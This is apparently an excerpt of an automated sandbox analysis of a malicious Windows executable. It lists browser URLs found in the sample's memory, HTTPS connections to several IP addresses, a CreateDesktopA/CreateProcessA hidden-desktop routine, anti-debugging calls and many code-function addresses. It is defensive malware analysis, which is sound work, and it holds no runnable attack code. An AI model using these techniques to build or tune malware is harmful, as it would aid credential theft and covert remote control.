            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000037B1000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2757142044.0000000003A95000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758340316.0000000003C66000.00000004.00000020.00020000.00000000.sdmp, W4OHLX.15.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.000000000379F000.00000004.00000020.00020000.00000000.sdmp, SJMO89.15.drString found in binary or memory: https://www.ecosia.org/newtab/
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000037B1000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2757142044.0000000003A95000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758340316.0000000003C66000.00000004.00000020.00020000.00000000.sdmp, W4OHLX.15.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.000000000379F000.00000004.00000020.00020000.00000000.sdmp, SJMO89.15.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758763558.0000000003EE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758763558.0000000003EE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758763558.0000000003EE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758763558.0000000003EE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758763558.0000000003EE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49821
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknown | Network traffic detected: HTTP traffic on port 49842 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49864
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49782
            Source: unknown | Network traffic detected: HTTP traffic on port 49836 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49871 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49816
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknown | Network traffic detected: HTTP traffic on port 49849 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49856
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49811
            Source: unknown | Network traffic detected: HTTP traffic on port 49816 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49841 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49805
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49849
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49804
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49846
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49842
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49841
            Source: unknown | Network traffic detected: HTTP traffic on port 49838 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknown | Network traffic detected: HTTP traffic on port 49821 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49828 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49797 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49805 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49838
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49836
            Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49782 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49832
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknown | Network traffic detected: HTTP traffic on port 49864 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49871
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49792
            Source: unknown | Network traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49856 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49765 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49804 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49832 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49811 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49828
            Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49846 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49792 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknown | HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 159.69.102.165:443 -> 192.168.2.4:49739 version: TLS 1.2
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0041CB56 CreateDesktopA,memset,memset,CreateProcessA | 15_2_0041CB56

            System Summary

            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00401625 NtQueryInformationProcess,NtQueryInformationProcess | 15_2_00401625
            Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
            Source: C:\Users\user\Desktop\Ttok18.exe | Code function: 0_2_011E2309 | 0_2_011E2309
            Source: C:\Users\user\Desktop\Ttok18.exe | Code function: 0_2_011E0A40 | 0_2_011E0A40
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_0296B498 | 4_2_0296B498
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_0296B488 | 4_2_0296B488
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_02ADB498 | 8_2_02ADB498
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_02ADB488 | 8_2_02ADB488
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_0339B4A0 | 11_2_0339B4A0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_0339B490 | 11_2_0339B490
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_08C03A98 | 11_2_08C03A98
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0043E893 | 15_2_0043E893
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040C091 | 15_2_0040C091
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040E0A1 | 15_2_0040E0A1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00430141 | 15_2_00430141
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040E161 | 15_2_0040E161
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00440101 | 15_2_00440101
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0042C111 | 15_2_0042C111
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040C121 | 15_2_0040C121
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040C1C1 | 15_2_0040C1C1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_004401C1 | 15_2_004401C1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_004121E1 | 15_2_004121E1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040A181 | 15_2_0040A181
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00430251 | 15_2_00430251
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040C261 | 15_2_0040C261
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040A221 | 15_2_0040A221
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0042C221 | 15_2_0042C221
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040E231 | 15_2_0040E231
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_004122A1 | 15_2_004122A1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00412351 | 15_2_00412351
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040E301 | 15_2_0040E301
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00430311 | 15_2_00430311
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00440311 | 15_2_00440311
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0042C321 | 15_2_0042C321
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040A331 | 15_2_0040A331
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_004103C1 | 15_2_004103C1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0042C3C1 | 15_2_0042C3C1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_004123F1 | 15_2_004123F1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040E3F1 | 15_2_0040E3F1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040C381 | 15_2_0040C381
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040A411 | 15_2_0040A411
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040C421 | 15_2_0040C421
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_004104D1 | 15_2_004104D1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_004404D1 | 15_2_004404D1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_004144E1 | 15_2_004144E1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040E4A1 | 15_2_0040E4A1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_004124B1 | 15_2_004124B1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00410571 | 15_2_00410571
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040E571 | 15_2_0040E571
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0042C511 | 15_2_0042C511
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040A521 | 15_2_0040A521
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040C531 | 15_2_0040C531
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040A5C1 | 15_2_0040A5C1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040E641 | 15_2_0040E641
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00440611 | 15_2_00440611
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00410621 | 15_2_00410621
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040C631 | 15_2_0040C631
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0042C6C1 | 15_2_0042C6C1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_004106D1 | 15_2_004106D1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040C6D1 | 15_2_0040C6D1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040A6B1 | 15_2_0040A6B1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040A771 | 15_2_0040A771
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00440701 | 15_2_00440701
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040E711 | 15_2_0040E711
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_004327C1 | 15_2_004327C1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0042C781 | 15_2_0042C781
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_004127A1 | 15_2_004127A1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_004107A1 | 15_2_004107A1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00440811 | 15_2_00440811
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040C821 | 15_2_0040C821
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040A821 | 15_2_0040A821
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040A8C1 | 15_2_0040A8C1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0042C8D1 | 15_2_0042C8D1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040E951 | 15_2_0040E951
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00440951 | 15_2_00440951
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040A961 | 15_2_0040A961
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040C971 | 15_2_0040C971
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0042C9D1 | 15_2_0042C9D1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_004109F1 | 15_2_004109F1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00412991 | 15_2_00412991
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00408A41 | 15_2_00408A41
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040AA71 | 15_2_0040AA71
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040EA11 | 15_2_0040EA11
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040CA31 | 15_2_0040CA31
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040CAF1 | 15_2_0040CAF1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0042CAA1 | 15_2_0042CAA1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00410AB1 | 15_2_00410AB1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00412AB1 | 15_2_00412AB1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0042CB41 | 15_2_0042CB41
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00432B51 | 15_2_00432B51
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040AB61 | 15_2_0040AB61
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00408B01 | 15_2_00408B01
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040EB01 | 15_2_0040EB01
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040EBC1 | 15_2_0040EBC1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00408BC1 | 15_2_00408BC1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040CBF1 | 15_2_0040CBF1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00412B81 | 15_2_00412B81
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00410B91 | 15_2_00410B91
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00412C51 | 15_2_00412C51
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040AC61 | 15_2_0040AC61
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00408CE1 | 15_2_00408CE1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040CD41 | 15_2_0040CD41
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040AD51 | 15_2_0040AD51
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00414D61 | 15_2_00414D61
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0042CD61 | 15_2_0042CD61
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00408D71 | 15_2_00408D71
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00410D11 | 15_2_00410D11
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040ED31 | 15_2_0040ED31
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040EDD1 | 15_2_0040EDD1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040EE71 | 15_2_0040EE71
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040AE11 | 15_2_0040AE11
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00408E11 | 15_2_00408E11
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0040CE31 | 15_2_0040CE31
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00410EA1 | 15_2_00410EA1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_00410F41 | 15_2_00410F41
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040EF5115_2_0040EF51
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040AF5115_2_0040AF51
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00408F1115_2_00408F11
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040CF3115_2_0040CF31
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042CFE115_2_0042CFE1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040CFF115_2_0040CFF1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040F05115_2_0040F051
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041107115_2_00411071
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040900115_2_00409001
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040B03115_2_0040B031
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040B0D115_2_0040B0D1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004090E115_2_004090E1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040D09115_2_0040D091
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041114115_2_00411141
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042D17115_2_0042D171
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043F11115_2_0043F111
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040F12115_2_0040F121
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0044313115_2_00443131
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040F1D115_2_0040F1D1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004431D115_2_004431D1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042B1E115_2_0042B1E1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040918115_2_00409181
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040D25115_2_0040D251
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041123115_2_00411231
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040923115_2_00409231
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040F2C115_2_0040F2C1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004112D115_2_004112D1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040B2E115_2_0040B2E1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0044329115_2_00443291
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040935115_2_00409351
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0044336115_2_00443361
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040B37115_2_0040B371
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040D30115_2_0040D301
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043F31115_2_0043F311
